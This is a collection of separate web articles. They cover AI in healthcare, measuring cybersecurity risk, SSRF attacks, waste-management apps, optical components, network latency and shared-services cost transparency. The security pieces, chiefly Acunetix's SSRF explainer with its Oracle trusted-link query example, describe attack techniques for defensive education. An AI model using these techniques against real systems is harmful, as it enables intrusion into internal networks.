The cost of healthcare is just not keeping up with inflation. Healthcare systems will strive to remain viable unless big structural and transformational changes are made. Health systems also require a larger staff, but the World Health Organization estimates that a 9.9 million physician, nurse, and midwife shortage will exist globally by 2030, despite the fact that the global economy might provide 40 million new health-sector jobs by 2030. Not only do we need to recruit, educate, and retain additional medical professionals, but they also need to make sure that their time is spent where it is most valuable—caring for patients. And meanwhile, technology-powered bots can take up the other repetitive functionalities.
Now that we are well-versed with the needs, let’s analyze how they improvise the overall healthcare facilities:
- Claims Management
An automated claims processing system can transport claims and any necessary electronic health records in real time from the provider. In addition to processing claims, automated algorithms are able to validate eligibility, benefits, provider contracts, and medical diagnostic data in real time.The health insurance communication, provider and member matching, and quality control are all handled by the claims management services provided by Smart Data Solutions. Claims management outsourcing might free up time and resources for other projects at your business.
- Appointment Setting
AutomationEdge’s new, simplified hospital booking software empowers both patients and administrative staff to enhance their service delivery. The amount of time allotted for various sorts of individual visits will be determined by the scheduling system, and the demands of the doctors will determine the best times of day for patient visits.Here’s a quick summary to know how to increase scheduling effectiveness and how talent management software can be useful:
- Schedule the appropriate personnel for the desired shifts.
- Allow for unconventional timetables.
- Payroll and scheduling can be combined for effective operations.
- Maintain compliance.
- Make the schedules publically available in advance for better coordination.
- Enhances adaptability and scalability.
- Data Management
The collection of patient data from various providers and organization sources is best done by data management bots. It enables the entry of patient data by healthcare professionals into a single database where it may be safely kept, processed, and shared.
While maintaining the confidentiality and privacy of the data, health data management tools help companies to integrate and analyze medical data to increase the effectiveness of patient care and derive insights that can enhance medical outcomes.
- Billing and Reconciliation
Medical billing software helps clinics get paid more quickly, increase workflow efficiencies, maintain patient information up-to-date, and reduce paperwork while establishing efficient digital workflows for crucial activities.
Predictive analytics can help support medical decisions and actions and prioritize administrative tasks to improve care. Another area where AI is starting to take root in healthcare is using predictive modeling to identify individuals at risk of getting a condition – or having one worsen – as a result of lifestyle, ecological, genomic, or other factors.
Apart from these basic areas of improvisation, let’s consider other areas in healthcare where AI turns out to be the hero:
The Concluding Note
The most common use of AI in healthcare involves NLP applications that focus on understanding and classifying clinical documentation. NLP systems can assemble unstructured clinical notes on patients, providing incredible insight into comprehending quality, improving methods, and better results for patients.
The greatest challenge to implementing AI in healthcare is not whether the technologies are capable enough to be leveraged but rather ensuring their easy adoption in day-to-day clinical practices. In time, clinicians may prefer migrating toward tasks that require uniquely human skills and cognitive function with the highest level of innovation and an analytical approach. Perhaps the only healthcare providers who will lose out on the optimum potential of AI in healthcare may be the ones who refuse to work alongside it.
Still curious about how AI can be implemented across the healthcare industry? Contact us for a FREE DEMO. AutomationEdge is a leading provider of Conversational RPA and Conversational AI and automation solutions. | <urn:uuid:92cae070-cc7c-4e73-a312-1753aeaf8f82> | CC-MAIN-2022-40 | https://automationedge.com/blogs/ai-the-tech-medicine-ameliorating-the-healthcare-industry/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00541.warc.gz | en | 0.920255 | 1,091 | 2.6875 | 3 |
Technology can’t help itself from falling into the wrong hands. It is available to security experts and cyber attackers alike. Despite the frivolous attempts to strengthen security protocols by organizations worldwide, over $4.1 billion was lost due to cybercrime in 2020-21 alone.
From small phishing attacks to organization-wide shutdowns, even a minor system breach can do lots of damage. Monitoring information security efficiency is a key performance indicator for businesses. It helps them articulate the problems and lay down safety nets to lower the probability of a potential breach. But how to measure anything in cybersecurity risk?
Dive in to find out!
Table of Contents
Cybersecurity Risk: At a Glance
Cybersecurity risk tells you how likely an online business is to lose money, personal data, or internal assets due to unauthorized access which breaks confidentiality. To put it another way, it gives you the amount of exposure/vulnerability your business has when it comes to networks, devices, and cloud-based systems.
While bigger companies hire dedicated security experts to oversee their operations, smaller organizations often fall prey to data loss, squandered funds, or constant downtime due to a security breach. This can impact sales, and brand value and even deteriorate your customer’s trust in the brand.
We can measure this risk using conventional forecasting or statistical analysis, but before we do that, let us look at the ways through which we can assess risks.
How to Measure Cybersecurity Risk?
To quantify cybersecurity risk, you can use a framework that relies on a threat, vulnerability, and financial damage. It is worth noting that even though the terms ‘vulnerability’ and ‘cyber risk’ might sound the same, they are not. Vulnerability is a flaw that leads to unauthorized network access whereas ‘cyber risk’ determines the probability of that vulnerability being exploited.
The formula to measure Cyber Risk = Threat x Information value x Vulnerability
Here are the steps you need to follow when measuring cybersecurity risk:
Step 1: Value derivation
Firstly, you need to start with a system-wide assessment of security weaknesses and then assign a security level to them. Imagine a scenario where you do get hacked, what are the assets that could cause the most damage if lost?
Prioritize the information you want to keep safe in the same way you prioritize day-to-day tasks. Note how the loss of a certain database may affect the company as a whole, brand value, and finances. Put yourself in the shoes of a third person and evaluate the loopholes which could be used to gain improper access or deter the smooth functioning of your systems.
Once this is done, lay out a rating system (1-10, 1 being extremely low-risk) for different areas of your business to check if the existing systems suffice or not.
7-10: You need to implement a lot of changes in these systems and install various barriers to lower the possibility of a cyber-attack.
6-3: Moderate-level risks that can be fixed via small adjustments.
1-2: In these areas, highly effective security systems are already laid out. They only require regular firmware updates to function properly.
Step 2: Focusing on Vital Assets
Use audit reports or software security analysis teams to prepare an assessment report. This will help the managers identify the areas which need improvement and have a high likelihood of being hacked. Vital assets can vary from one company to another.
This can include everything ranging from trade secrets, patents, and employee data to hardware, strategy, or security policies. A routine assessment of the activities of all the employees who have access to crucial information is also necessary.
Step 3: Deploying Protective Barriers
Once the vulnerabilities have been discovered, an organization should immediately put safety nets in place to increase security. Be it a revision of company policies, getting rid of outdated tools, or demotion of certain individuals, you must keep the interests of the company as a whole in mind.
Changes can be further implemented by sticking to military-grade encryption for data, deploying two-factor authentication to prevent unknown logins, and configuring a virtual private network (VPN) when accessing public networks.
Look for software security companies that provide intrusion detection mechanisms and automatic updates so that you can focus on operations without worrying about the risk of cyber hacking.
Statistical analysis is another way to measure cybersecurity risk by collecting data and identifying obtrusive patterns. Unlike conventional methods, this process gives an accurate risk-to-safety ratio. You can use software like RStudio, SPSS Statistics, and TIMi Suite for statistical analysis.
Types of Security Threats
With the recent convergence of work professionals to the work-from-home system, we now heavily rely on our systems to keep our data secure. This has also opened the doors for various cyber criminals to exploit loopholes and bypass security measures. Whether you seek the assistance of an independent consultant or have an in-house IT team, these are a few forms of corporate cybersecurity risks that you should steer clear from:
Malware is essentially software that is designed to bring a system down by gaining unauthorized access to the network.Each software is unique and is designed to target different aspects of a system, for instance: payment gateways, spyware on landing pages, spam email sign-up forms, etc.
|Adware:||This software displays repetitive adverts on the user’s screen. Though they are not dangerous, spammy adverts can decrease the speed of your website and redirect visitors to other dangerous viruses.|
|Viruses:||Viruses are commonly installed with files and can spread across multiple systems quickly. This can be countered by having a robust enterprise-wide antivirus system.|
|Fileless malware:||These softwares do not rely on an executable file, but rather come with platforms like PowerShell, MS Office Macros and other system apps.|
|Worms:||Much like a virus, worms spread quickly from one system to another but are targeted at specific databases instead of the entire system. Keeping your system updated with all the latest patches and firewalls is one solution to stay safe.|
|Trojans:||These softwares prompt the user into installing or executing them while giving a false idea that the software poses no harm.|
|Bots:||Bots work in an automated manner and create a botnet via which a hacker can control multiple systems and launch larger attacks.|
|Ransomware:||This involves stealing the data of an enterprise followed by threats of deletion, unless the user pays a ransom amount to the hacker.|
|Spyware:||Spyware is used to monitor user activity and send the information to other marketing channels. This can also compromise your passwords and personal data.|
In this illegal practice, a hacker uses another person’s computer to mine cryptocurrency without their knowledge or consent.This crypto mining software typically runs in the background and is hidden within the system. This method of cyber-hacking accounted for a loss of $52 million in the first four months of 2022.
These attacks involve emails and text messages from anonymous accounts which include a link to a fake offer. As soon as the user clicks on such links, they are redirected to a phishing website. These attacks might also involve active human participation, for example, someone pretending to be from the IT department and asking you to disclose personal data.
Complex forms of these attacks include MITM attacks, DDOS attacks, and APT attacks. Learn more about the common cyberattacks to look out for.
Evaluating cybersecurity risk is a fairly arduous process, but is highly imperative about potential data loss.
You can start by identifying the key problems in your system and then sorting them accordingly. Once this is done, reinforce software that automates updates and keeps attacks at bay.
> Learn more on how to become a Certified Information Security Manager (CISM).
> Learn more on how to become a Certified Cloud Security Professional (CCSP).
Thank you for reading my blog.
If you have any questions or feedback, please leave a comment. | <urn:uuid:81b2db59-1167-45e6-8d53-3ea33592d7d0> | CC-MAIN-2022-40 | https://charbelnemnom.com/measure-anything-in-cybersecurity-risk/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00541.warc.gz | en | 0.923421 | 1,708 | 2.8125 | 3 |
A Server Side Request Forgery (SSRF) attack gives an attacker the ability to use your web application to send requests to other applications running on the same machine, or to other servers which can be on the same or on a remote network. Since the requests are being piggybacked via your server, the target might let its guard down, allowing requests which would otherwise not be possible from an untrusted source.
In this article, we take a deep look at two types of SSRF – Trusted SSRF and the Remote SSRF as discussed by Alexander Polyakov, and Dmitry Chastuhin at Blackhat Security (PDF).
Trusted Server Side Request Forgery
Trusted Server Side Request Forgery forges requests to predefined trusted connections through trusted links which the attacker uses to send requests from. In order to perform such an attack the attacker must either have access to the application or else to a vulnerability that can be used to perform the attack.
An example of a Trusted SSRF attack using an Oracle Database with public rights can be seen below:
SELECT * FROM myTable@HostX
The use of an Oracle trusted link enables the attacker to send requests to and receive responses from ‘Host X’. This type of SSRF attack would not raise any alerts since HostX is configured to trust connections from the Oracle database.
There are some stumbling blocks for the attack to be successful. The attacker would need to make use of reconnaissance techniques to identify the existence of Host X. The attacker would also require a trusted connection to the database, which can be achieved by exploiting other vulnerabilities such as SQL injection, and incorrectly configured access control for the database user used by the web application.
Remote Server Side Request Forgery
Remote Server Side Request Forgery allows an attacker to initiate connections and make requests to any remote server, directly from the vulnerable web application or web service. The attacker can thus use the vulnerable server to perform port scans, initiate attacks to other hosts, and perform any other type of malicious activity on other servers using the vulnerable server.
From the attacker’s point of view, this presents various advantages. These include the ability to better conceal malicious actions, the ability to use the processing power of the vulnerable server to initiate other attacks, and the possibility of using a farm of servers, which might be running the same vulnerable software, as a launch pad of a distributed attack.
SSRF attacks can be initiated through various vulnerabilities. These vulnerabilities can be classified in different groups such as the processing of an XML file format through XML External Entities (XXE). SSRF attacks can also be initiated by direct sockets access through CRLF injection, by processing URLs of a net library such as cURL or the ASP.NET URI, and by making use of links to external data in databases such as PostgreSQL.
In this article, we have seen how Server Side Request Forgery (SSRF) vulnerabilities may be used as a gateway through your firewall into your internal network or to launch attacks against third-party systems.
Acunetix Web Vulnerability Scanner can detect SSRF vulnerabilities through its AcuMonitor service. When a scan is performed on a website, Acunetix WVS will inject various payloads instructing a vulnerable server to make HTTP requests to the AcuMonitor server. Acunetix WVS will then verify if the server has indeed performed the requests as instructed. Acunetix WVS will then provide information about the HTTP request that was performed such as the IP address of the server that made the request and the page where the payload was injected.
Get the latest content on web security
in your inbox each week. | <urn:uuid:9f3db02a-856f-475f-a2ec-18f586b99819> | CC-MAIN-2022-40 | https://www.acunetix.com/blog/articles/trusted-remote-server-side-request-forgery-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00541.warc.gz | en | 0.917395 | 772 | 2.8125 | 3 |
How to Build a Reliable Waste Management and Segregation App
by Smitesh Singh, on Nov 9, 2021 9:39:38 PM
Gone are the days when technology was just an economic propellant. Today technology through its unprecedented potential is actively playing a major role in the global environmental crisis such as climate change and waste management. According to research, without effective waste management, there will be more plastic in the oceans than fish by 2050. Government and public authorities are therefore actively looking for cost effective digital solutions to make the dream of a cleaner and greener planet a reality. In this blog, we will talk about how technology is helping rural and urban areas to manage waste and foster a cleaner industrial era.
Locating nearest recycling centers
Apps can help the governments to spread awareness about the benefits of recycling, and also redirect them to various recycling centers. The APIs from these apps can also be integrated into various digital marketplace apps that can help their end-users manage waste generated from buying their products. The app helps users locate the nearest recycle centers in their vicinity. Also, the app teaches users the different DIY ways to waste recycling.
Segregate types of waste materials
Domestic and industrial waste is a mix of various biodegradable and non-biodegradable waste that need to be segregated in order to be processed suitably. There are different kinds of plastics, among which some are non recyclable, while others are. Mistakes in sorting waste can cause improper waste disposal. Moreover, manual monitoring can be inefficient and expensive. AI/ML object recognition models when implemented on apps can help users identify plastics and their kinds. Apps can help users identify the right recyclable plastics and educate them on the profitability of recycling such plastics.
Wiki for waste management
The waste management app can help users obtain insights on basics of waste management and go ahead with the first steps in their waste management journey. The app can also function as a waste payment app at various recycling facilities as well as a way to access local data and waste management policies. Moreover, people can also use this app to monitor and track waste pickups. Therefore, it makes it easy for users to keep track of the amount they spend on disposing of trash.
Identify non-recyclable wastes
Apps can help users identify waste materials that are hard or impossible to recycle, and source them to the right places. The app can also act as a news portal that provides users with environmental trends and news. Users can also track their contribution to the recycling drills, campaigns etc. on the app. The app also helps broadcast waste management and recycling news, policies and information. Another feature of the app is the waste collection and recycling dates reminder. Waste management apps can use AI systems like Google Assistant and Amazon Alexa to help users access waste management and recycling information.
IoT based Smart Dustbins
A number of companies have started producing smart bins that can do a variety of tasks. Many are sensors that identify trash levels and send alerts when they’re overflowing. This data can help users track their dumping habits while optimizing schedules for trash pickups, and reduction of fuel consumption. These trash cans can also be built with interactive screens that can guide users in good waste management practices. People can learn new things on disposing of items of varied biological character. This way, users become aware of what can be thrown away and what can be recycled.
Fleet Management Systems
Technology can level up the trash pick up systems for underdeveloped areas through fleet management. Digital Fleet management is prominent in the logistics industry, but it can significantly aid garbage collection. The systems makes use of network sensors along with the GPS data to devise vehicles’ routes. Taking up the same way every day is easy but it isn’t always efficient. Fluctuating traffic, weather and waste quantity can create paths that are optimal and cost saving. Fleet management systems when tapped on smartphones allow drivers to adjust their routes to save time and reduce emissions.
As people adopt newer technologies, additional research and development is taking shape. As the technology progresses, and automation is becoming ubiquitous, there is expected to be an exponential surge in waste management technology. The forthcoming era that needs technological and smart solutions to take up manual and mechanical tasks of waste management or at the least aid people in doing it effectively. In order to start your journey with apps for sustainable waste management, get in touch with a waste management app development company. | <urn:uuid:04da37e6-c6d5-4e40-a908-cf9b77b0b904> | CC-MAIN-2022-40 | https://blog.datamatics.com/how-to-build-a-reliable-waste-management-and-segregation-app | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00541.warc.gz | en | 0.94069 | 906 | 3.03125 | 3 |
What is cost transparency?
To put it simply, Cost Transparency is a term used to describe the tracking within the organisation of the total cost required to provision and maintain products and services for the benefit of the enterprise. It is also about establishing what different products and services exist, what they cost and how they relate to each other and to the business.
If one considers that a Shared Services unit provides a range of administrative and support services, along the lines of IT, HR and finance to the entire organisation, it has never been more important for both the unit delivering and those receiving such services to completely understand the costs associated with this.
Cost transparency is the answer, as it is designed to provide business, finance and shared service owners with detailed and meaningful insights into their respective areas. It creates both visibility and understanding of the costs and volumes of their entire shared service product and service portfolio, enabling the organisation to make informed and fact-based strategic and tactical decisions concerning its shared service investments.
Cost transparency enables Shared Services to move beyond merely delivering a product or service to a business unit, to the point where it is actually able to quantify the value obtained from such a delivery.
Shared Services cost transparency is all about showing the business:
- How capacity planning can reduce IT costs by 30-50 per cent (opens in new tab)
- What services it consumes
- The cost of delivering these services
- Providing a granular breakdown of costs according to activities
- Offering clarity around the resources involved in producing these services
What are shared services?
Typically, shared services encompass operations like HR, IT, Finance, Procurement, Legal Services, Marketing, and Sales. Business operations that used to be shared by several units within the business are consolidated under the Shared Services umbrella in order to eliminate redundancies and inefficiencies, with individual business units effectively becoming internal clients.
Since there will always be multiple business units in an organisation using services provided by the shared service centre, there are obvious gains in efficiency and reduction in costs. These services are then charged back to the business units that require them.
- Business leaders unable to show IT cost transparency (opens in new tab)
What is business demand?
Business demand is the requirement that revenue-generating business units place on their shared service providers – both internal and outsourced external ones – to enable their business operations. This could encompass any number of services, including such diverse ones as real estate from which to conduct business, through to IT platforms or other products and services that allow business to operate and transact.
Business often tends to think demand is one sided, as it is the entity ultimately footing the bill, and Shared Services simply needs to deliver on all requests. However, the reality is that all areas within the enterprise, including Shared Services, have a fixed capacity and a limited supply from which to meet all these demands. However, Shared Services departments are best placed to know the business ins and outs, and are thus well positioned to choose which technologies or services they can contribute to enable their internal customers business strategies, while still remaining agile and flexible enough to accommodate business needs.
Why correct behaviour is so important in large organisations
It is important to understand that shared service areas, or centralised functions, often have strategies developed for the enterprise they service that, as a whole, they wish to pursue and see manifested throughout the organisation.
In large companies, there are often divisional or region-specific behaviours which can conflict with overall corporate goals. A good example of such conflict can be considered in the following example:
A large business occupies multiple buildings in a central business district. One of these edifices is shiny, new and expensive, while another is a building the company already owns, but which is now ageing. Management agree that there is adequate capacity for the older building to house the staff of both buildings, and since a lease break on the new building is coming up, they take the decision to consolidate into a single building that will offer better value.
The best behaviour for the company to encourage is a swift move and consolidation into the one better value, yet ageing building. However, unless an incentive is offered to those in the newer, smarter premises, they will be far less likely to want to switch buildings, and will thus most likely drag their feet. An eloquent solution would therefore be to establish a subsidised recharge for early adopters, and use a commercial incentive to drive quicker adoption of this particular business strategy.
How can shared services influence business demand and behaviours while satisfying the business and its strategic aspirations?
- Will data transparency regain consumers’ trust? (opens in new tab)
The simplest and easiest manner to achieve this is to utilise the laws of supply and demand, and just like any good market place, both of these factors will need to come into play to reach a dynamic constantly evolving equilibrium. This should be a driving force when creating pricing around Shared Services.
It is necessary that those services that are used are felt by the consuming business, and the best way to ensure this is by instituting a meaningful, trusted and accurate chargeback or show-back model to establish commercial awareness and incentives linked to consumption. The old adage that there’s no such thing as a free lunch is very true in this context.
Creating a commercial awareness means allowing consumers to choose service alternatives based on service level agreements (SLAs) and pricing, which in turn allows them to choose exactly what they order and how much they pay for the lunch bill!
When consumers start paying for what they use, it has a positive effect on the entire business, because it immediately changes employee behaviour, since the items can no longer be used as if they were free. Studies show that feedback around cost implications on consumption delivered in a timeous fashion is effective in changing consumer behaviour on an ongoing basis.
Of course, setting the correct price point is just as vital when it comes to influencing business demand. As with all markets, there will be times when a subsidy or tax is the best tool to drive the correct, holistic organisational behaviour, and this is often the case within Shared Service organisations.
For example, setting up a new data centre may be expensive for the first adopters, as start-up costs are high and require economies of scale to see true benefits. The question that needs to be answered then is how can cost transparency be used to influence this behaviour?
The answer is to subsidise the price of the data centre, with the goal of encouraging adoption until the economies of scale kick in. This is done by artificially lowering the price point as a way to initially make the data centre attractive to newcomers.
Naturally, this places a high level of responsibility on shared services to educate its customers on the services it performs, the results delivered and the opportunities for improvement. Cost transparency clearly enables such education relatively easily and – when coupled with a solid understanding by shared services around what its customers do with the services they buy, and how well these products meet the customers’ needs – should help shared services to accurately gauge customer requirements and estimate the impact of these on business performance. Once this is achieved, shared services should also be positioned to reliably identify the next form of leverage to pursue.
Once these initial objectives are successfully met, the next step for shared services is to expand the portfolio of services offered, after which it needs to begin leveraging knowledge-based expertise. It needs to look beyond what it does currently, linking its plan to overall company goals and assessing how it can optimise its contributions on behalf of all parties.
In the end, as shared services strategies mature, the next step in their evolution may well see them move to the core of the business, where they will no longer just be focused on driving cost savings, but on performing business-critical processes that contribute a much higher level of organisational value.
What are chargeback and showback models?
On the other hand, it may be advisable to launch a shared services approach using the showback model for a limited period of, say three to six months, as a way of effectively introducing the manner in which it all works. Once employees have a better understanding of how the costing will work and have had the opportunity to become used to the model, switching it out for a chargeback approach will be much easier for them to accept.
Chargeback is, as the name suggests, a method of charging a company’s internal consumers for the shared services they use. So, for example, with IT services, instead of bundling all the IT costs under the IT department, a chargeback program will allocate the various costs of delivering IT – such as hardware, software and maintenance – to the individual business units that consume them.
In those cases where shared services are viewed as essentially a commodity, accountability and efficiency improvements will likely afford the kind of significant cost savings that make chargeback a very attractive path.
Showback is closely related to chargeback, however while it offers many of the same advantages, it does not have all the drawbacks. While it does employ the same strategy as chargeback with regard to tracking and cost-centre allocation of expenses, through the measurement and display of the services cost breakdown by consumer unit, it does this without actually transferring costs back.
Costs remain in the shared services centre, but information about consumer utilisation is far more transparent. Moreover, showback is often much easier to implement as, unlike with the chargeback model, there are no immediate budgetary impacts on user groups.
Regardless of the model, however, both showback and chargeback operate on the same premise: that awareness drives accountability. However, it must be remembered that once business units are aware they will not be charged in the showback system, their attention to efficiency and improving usage may very well not be as focused.
How to build a trusted showback or chargeback model
In implementing such a model, it is worth noting that there are a number of prerequisites that one must have in place, in order to effectively create a trusted Cost Transparency solution that will help drive adoption:
• Create a defendable cost model
This should be a model that offers an accurate means for attributing cost and consumption, and can be achieved by identifying drivers of costs and using consumption based drivers that mimic reality as much as possible.
• Ensure that multiple options are made available
Allow consumers to utilise different options and service alternatives, such as the tiering of services, accompanying service levels and access to alternative technologies. There is little use in creating a chargeback or showback model in which consumers do not have alternative options or the ability to choose what products and services they consume, at appropriate price points.
Key aspects of the model, including data, inputs, changes and alterations in behaviour must be felt and the effect must be seen in a rapid fashion. Consumers must be able to see how their consumption choices and the changes they make to these have a visible and tangible effect on their business unit.
• Hosting Solution
Once both your model and reporting requirements have reached a sufficient scale, it is important to adopt a robust, secure and scalable software solution. In essence, it needs to be one that has the flexibility to accommodate any scenario, as well as the freedom to reflect how your business operates.
The crucial key to a successful cost transparency and cost model adoption, and one which will help to drive trust by being able to see what ownership or consumption basis has driven an allocation is the issue of granularity. Essentially, this is the ability to see all of the highly detailed driver information that makes up a charge. A good example here would be how a business unit may have been charged for ‘connectivity’ in the past, but this can now be broken down into component parts, such as the cost of the fibre, the servers, switches and routers involved in providing the service, as well as affiliated costs such as the power and cooling required in the data centre. Granularity makes the driver basis defendable and believable, and even in situations where the data is wrong, one can still drive a positive outcome through error identification and data remediation.
• Win over key stakeholders
It is important to identify key influencers in the organisation and focus on winning them over first – in this way, you convert them to evangelists of your model. Identify topical quick wins and deliver on those first. Communicate that it is a journey and manage expectations around changes. Just like shared services can’t deliver on all business asks, prioritise roadmap items and relentlessly focus on those to drive value. Create a governance process around changes, but exempt consumers from changes that may be linked to their performance or personal incentives. Win adoption of proposed changes by showcasing their intentions and intended benefits. Compare changes before and after.
Shared services allow for costs to be reduced through the economies of scale from centralisation of services, but when it comes to truly understanding costs, the shared services environment is extremely complex. This is exactly what the discipline of cost transparency is designed to address: enabling enterprises to attribute costs more accurately, while also enabling those people responsible for specific areas of the business to understand which costs they are able to control and which levers they can pull to effect changes in these.
With cost transparency, one not only obtains a clearer view of costs, but also the ability to do something about them in a way that helps to increase performance. The granular knowledge of what services are not being used to their fullest extent will enable consolidation and cost reduction, coupled with increased efficiencies.
This demonstrates that the best cost transparency strategies move beyond simply cost savings and into the arena of optimisation. In the end, it is about transforming the conversations between what the business unit needs and what Shared Services provides.
Ultimately, Cost Transparency as a solution is designed to help businesses to reduce, consolidate and standardise expenditure. After all, if you are able to effectively unpack the cost of shared services, you can use this knowledge to drive improved savings. Cost Transparency is designed to give business access to the levers it needs to make truly informed IT decisions, unlocking greater value from existing IT investments and delivering increased savings with regard to future investments.
When used effectively, Cost Transparency is a powerful tool that creates an efficient and optimised organisation where business and shared service providers are aligned and organisationally altruistic behaviours are encouraged and incentivised.
Blake Davidson, Head of Delivery, Magic Orange (opens in new tab) | <urn:uuid:e569103f-1b29-49ec-a6f6-13ad08bbe709> | CC-MAIN-2022-40 | https://www.itproportal.com/features/role-of-cost-transparency-in-shaping-business-demand/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00541.warc.gz | en | 0.958735 | 2,956 | 2.6875 | 3 |
DigiLens Creates 'Liquid Gratings'
Like other component developers, it’s splitting light into different wavelengths using Bragg gratings. But unlike others in this field, it’s forming these Bragg gratings in liquid crystals rather than solid substrates such as silica and silicon. As the characteristics of the liquid crystal can be modified by applying an electric current, Digilens can split off a specific wavelength and then adjust its power or switch it in a single operation.
"We’re compressing functionality onto a waveguide that previously would have required multiple separate devices," says Jonathan Waldern, CEO of DigiLens. This means that Digilens’s components will be simpler to make and thus lower in cost, he adds.
Digilens calls its technology electrically-switchable Bragg grating (ESBG) or “S-Bug". Components are made by creating a row of ESBGs, each one handling a specific wavelength, on top of a single silica waveguide. The ESBGs themselves are formed from a mixture of polymer and liquid crystal, which have Bragg gratings (a series of stripes of different refractive index) created in them to reflect back specific wavelengths. This is done by exposing the polymer and liquid crystal mixture to ultraviolet light from intersecting laser beams, which form an interference pattern. The liquid crystal diffuses to areas of high light intensity, creating microdroplets.
In use, when a voltage is applied to this arrangement, the refractive index of the microdroplets is reduced, effectively erasing the grating and letting all the light through. With no applied voltage, the grating diffracts light at a specific wavelength out of the waveguide.
Digilens has been using this technology for making microdisplays for some time, and now it's moving into the telecom market.
It's starting by developing dynamic spectral equalizers (DSEs), devices that extend the range of dense wavelength-division multiplexing (DWDM) systems by ensuring that power levels are the same in every channel. It's aiming on shipping 6- and 10-channel models this quarter.
At least two other vendors already make DSEs. One of them, Corning Inc. (NYSE: GLW) uses liquid crystals to adjust power levels in the same way as Digilens. But it requires a string of other devices to split the light into different wavelengths and handle polarization issues (see What's Hot At The OFC). The other vendor, Ultraband Fiber Optics Inc., is basing its developments on acousto-optical tunable filters.
Digilens is also planning on making an electronic variable optical attenuator, a single channel version of its DSE, in the same time frame.
In the longer term, Digilens is planning to develop 1x1 and 2x2 optical switches suitable for restoration and protection functions, with a target shipment date in 2002.
The benefits of ESBGs become apparent in optical add-drop muxes (OADMs), which Digilens is also planning to develop. In today’s OADMs, the wavelengths must be broken out so that each one can be directed by a separate 2x2 switch. Finally, all the wavelengths must be recombined. Waldern claims that DigiLens could do all this in a single integrated component. For a six-channel device, this would reduce the component count by a factor of eight, and reduce the cost by about a third, he says.
DigiLens licenses the intellectual property rights for the ESBG from Science Applications International Corp. (SAIC), an independent R&D company which owns Telcordia Technologies Inc. (formerly Bellcore). SAIC is the biggest investor in DigiLens with a 10 percent stake.
Digilens recently raised a fourth round of $40 million, bringing total funding to date to $67 million (see Round 4 for DigiLens: $40M).
-- Pauline Rigby, senior editor, Light Reading http://www.lightreading.com | <urn:uuid:203fc39d-0936-434a-a028-59eb9c4a5a4c> | CC-MAIN-2022-40 | https://www.lightreading.com/digilens-creates-liquid-gratings/d/d-id/571406 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00541.warc.gz | en | 0.913478 | 852 | 2.984375 | 3 |
When a client sends a request to a server across the Internet a complicated series of network transactions are involved. A typical request path will have the client sending the request to a local gateway which in turn routes the request to a sequence of routers, through firewalls and load balancers, and finally to the server. Each step or “hop” involves:
All of this takes time, so each hop introduces a delay. Network latency is the total time, usually measured in milliseconds, required for a server and a client to complete a network data exchange. Even if there are no intermediate hops, which is never the case for communications across the Internet, latency is still involved because the request has to traverse layers of software and hardware at each end.
There are two ways to measure network latency:
If we’re concerned about how network latency affects application performance, then the Round Trip Time is what we care about. On the other hand, if we’re trying to optimize Internet of Things (IoT) transactions we’ll usually be more concerned about Time to First Byte latency.
When it comes to real-world applications such as high frequency stock trading, minimizing communications latency by even a millisecond potentially gives the trader a huge advantage. This is why, for example, Hibernia Atlantic (now acquired by GTT Atlantic) spent $300 million laying a 6,021km (3,741 mile) fiberoptic link from New York to London to deliver a Round Trip Time of 59 milliseconds, 6 milliseconds less than the next best link latency. It’s been estimated that the reduced network latency could give a large hedge fund an additional profit of close to $100 million per year.
Minimizing network latency is about optimizing all the elements of the networking infrastructure. Even when you’ve deployed ultra-high-performance hardware, optimizing software and protocols is the key and Application Delivery Controllers (ADCs) provide a range of features that deliver optimizations including:
Along with load balancing and infrastructure health checks, A10 Networks Thunder® Series Application Delivery Controllers (ADCs) deliver advanced traffic management and optimization features including offloading CPU-intensive SSL/TLS transactions from servers with SSL Offloading with Perfect Forward Secrecy (PFS) ciphers, content caching, compression, and TCP optimization.
Take this brief multi-cloud application services assessment and receive a customized report.Take the Survey | <urn:uuid:27a35f51-65d4-4ce4-b06a-dd0b6b01669b> | CC-MAIN-2022-40 | https://www.a10networks.com/glossary/what-is-network-latency/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00541.warc.gz | en | 0.903825 | 496 | 2.578125 | 3 |
Size and complexity are the enemies of cybersecurity
In cybersecurity we are always faced with the chance that our system harbors some, unknown vulnerability, and the possibility that vulnerability will be discovered by some malicious actor who will then use it against our system, as well as other, similar systems.
Cybersecurity vulnerabilities are the result of two kinds of errors or defects:design errors and implementation errors. A design error is where the functionality of a system or component is not properly and comprehensively analyzed and understood so that the resulting design does not cover all possible use cases. Analysis of a system requires understanding and capturing all the possible ways that a system will be used, as well as the limits of how the system will be used such that only the planned functionality is enabled by the system. The design is the plan for how the system will implement the functionality that satisfies the analysis results. The design captures the structure of a system or component and the breakdown of the partitioning of the major functionality.
Implementation is the realization of the design. The development of the system or component using software development tools such as editors and compilers in the specified languages and frameworks. All configurations are also included in the implementation. The development process often includes: a build and integration processes, coding standards, design patterns, code reviews, and testing as methods to increase the likelihood that the resulting implementation is as true to the design and has the least number of defects possible.
Both the design phase and the implementation phase provide opportunities for creating defects that may become vulnerabilities in the system or component. The number of defects produced in a system or component directly correlates to the complexity and size of the system, as defects typically occur at a rate per unit of development. So, roughly, a design or implementation that is twice as large will have twice the number of defects.
The complexity of a design or implementation has a similar effect of creating defects in a system. But, unlike implementation size the number of defects can increase much faster with increasing complexity. Complexity is difficult to quantify, but is related to how many elements are needed to create a solution and how many relationships are involved in those elements. It is also related to how many steps are needed to accomplish a use case of the system or component.
